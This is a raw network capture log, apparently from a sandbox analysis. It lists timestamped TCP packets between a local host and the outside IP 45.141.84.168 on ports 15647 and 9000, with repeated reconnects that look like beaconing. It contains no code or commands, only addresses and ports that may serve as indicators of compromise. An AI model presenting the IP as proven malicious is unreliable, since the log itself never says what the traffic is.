                                          Nov 28, 2024 13:39:39.756098986 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:39.756192923 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:39.818676949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:39.853916883 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:39.854008913 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:39.876136065 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:39.957242966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:39.957420111 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:39.974001884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.077399015 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.077533960 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.077668905 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:40.175246954 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.175400019 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:40.199430943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.258306980 CET90004975745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.258436918 CET90004975745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.258477926 CET497579000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:40.258601904 CET497579000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:40.278662920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.278889894 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:40.295382977 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.360665083 CET497589000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:40.378705025 CET90004975745.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.399646044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.399817944 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:40.400589943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.453578949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:40.480600119 CET90004975845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.480714083 CET497589000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:40.480930090 CET497589000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:40.496649027 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.496820927 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:40.562587976 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.562757015 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:40.600828886 CET90004975845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.601114035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.601186037 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:40.617747068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.682737112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.697778940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.697890043 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:40.778630018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.817972898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.818031073 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:40.818947077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.859721899 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:40.978737116 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:40.978940964 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.019412041 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.062973976 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.070044041 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.070139885 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.101535082 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.190443039 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.190505028 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.220726013 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.220817089 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.268933058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.269032955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.358669996 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.358727932 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.388988018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.463917971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.463998079 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.478780985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.584084988 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.584157944 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.590233088 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.641097069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.664958954 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.665051937 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.746638060 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.746733904 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.784962893 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.785307884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.828501940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.837119102 CET90004975845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.837399006 CET90004975845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.837423086 CET497589000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.837450027 CET497589000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.905575991 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:41.905674934 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.938477993 CET497599000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:41.958178997 CET90004975845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.058501959 CET90004975945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.058646917 CET497599000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:42.060399055 CET497599000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:42.066694021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.066764116 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:42.071791887 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.106857061 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.106950998 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:42.180320978 CET90004975945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.186722994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.226916075 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.227118015 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:42.227251053 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.349076033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.349153996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:42.388173103 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.388333082 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:42.471082926 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.471157074 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:42.508474112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.550640106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.594099998 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:42.643959999 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.644069910 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:42.751735926 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.751827955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:42.822731018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.844976902 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.845041037 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:42.872097015 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.966070890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.966149092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:42.966411114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:42.966475010 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:43.130624056 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.130680084 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:43.166296959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.211952925 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.212043047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:43.252402067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.252470016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:43.367486000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.367582083 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:43.372353077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.414844990 CET90004975945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.415064096 CET90004975945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.415096998 CET497599000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:43.415133953 CET497599000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:43.453643084 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.453772068 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:43.487502098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.516518116 CET497609000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:43.534981012 CET90004975945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.568552971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.568643093 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:43.573822021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.636415958 CET90004976045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.636527061 CET497609000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:43.636677027 CET497609000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:43.689033031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.689080000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:43.689110994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.734743118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:43.757375002 CET90004976045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.850670099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.850749016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:43.890245914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.890364885 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:43.970760107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:43.970854044 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:44.010394096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.062861919 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:44.066664934 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.066750050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:44.090894938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.132211924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.172148943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.172282934 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:44.186769009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.292192936 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.292273998 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:44.295332909 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.418658018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.418762922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:44.496608973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.496776104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:44.542676926 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.617216110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.617410898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:44.619921923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.672246933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:44.744065046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.744195938 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:44.911711931 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.911792040 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:44.938795090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.984749079 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:44.994009972 CET90004976045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.994123936 CET90004976045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:44.994184017 CET497609000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:44.994245052 CET497609000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.032223940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.032308102 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.065762997 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.109754086 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.110241890 CET497619000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.114398956 CET90004976045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.139821053 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.139924049 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.194689035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.194761038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.230221987 CET90004976145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.230333090 CET497619000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.230479956 CET497619000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.233521938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.260199070 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.281696081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.315093994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.315300941 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.350558996 CET90004976145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.353509903 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.353576899 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.473810911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.473884106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.516427040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.516499043 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.599795103 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.599879980 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.714930058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.715054989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.717607021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.719830036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.766005039 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.835170984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.835287094 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:45.837701082 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:45.891000032 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.002677917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.002770901 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.036689997 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.078497887 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.083880901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.083946943 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.124078989 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.157216072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.157321930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.246752977 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.246834040 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.277431965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.284951925 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.285033941 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.405014992 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.405107975 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.478768110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.478867054 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.568264008 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.568403959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.585952044 CET90004976145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.586097956 CET90004976145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.586170912 CET497619000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.586251020 CET497619000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.606311083 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.606426001 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.688342094 CET497629000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.706810951 CET90004976145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.726522923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.726583004 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.728465080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.781620979 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.808259964 CET90004976245.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.808361053 CET497629000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.808500051 CET497629000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.868020058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:46.868139029 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:46.931658983 CET90004976245.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:47.049930096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:47.050019026 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:47.069339037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:47.069436073 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:47.190546036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:47.190682888 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:47.194191933 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:47.234740019 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:47.354696035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:47.354775906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:47.371507883 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:47.422341108 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:47.512450933 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:47.512656927 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:47.676896095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:47.677094936 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:47.834011078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:47.834125996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:47.999288082 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:47.999385118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:48.155527115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:48.155611038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:48.170269012 CET90004976245.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:48.170454025 CET497629000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:48.170521975 CET90004976245.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:48.170572042 CET497629000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:48.282253027 CET497639000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:48.290728092 CET90004976245.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:48.321508884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:48.321611881 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:48.402241945 CET90004976345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:48.402343988 CET497639000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:48.402468920 CET497639000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:48.476963997 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:48.477061033 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:48.522356033 CET90004976345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:48.642826080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:48.642901897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:48.798480034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:48.798577070 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:48.965100050 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:48.965182066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:49.122256041 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:49.122365952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:49.288218021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:49.288315058 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:49.323393106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:49.375400066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:49.466650009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:49.466711044 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:49.489336967 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:49.489554882 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:49.586735010 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:49.586867094 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:49.687113047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:49.687196016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:49.727649927 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:49.727664948 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:49.727858067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:49.847596884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:49.847698927 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:49.947385073 CET90004976345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:49.947416067 CET90004976345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:49.947429895 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:49.947467089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:49.947505951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:49.947571993 CET497639000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:49.949709892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:49.950057030 CET497639000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:49.971321106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:49.971538067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:50.049235106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.049422026 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:50.058654070 CET90004976345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.058743954 CET497639000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:50.063332081 CET497649000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:50.074440002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.074757099 CET90004976345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.094785929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.167890072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.167963982 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:50.170841932 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.185013056 CET90004976445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.185101986 CET497649000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:50.185225010 CET497649000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:50.250348091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.250432014 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:39:50.287992001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:39:50.305136919 CET90004976445.141.84.168192.168.2.4
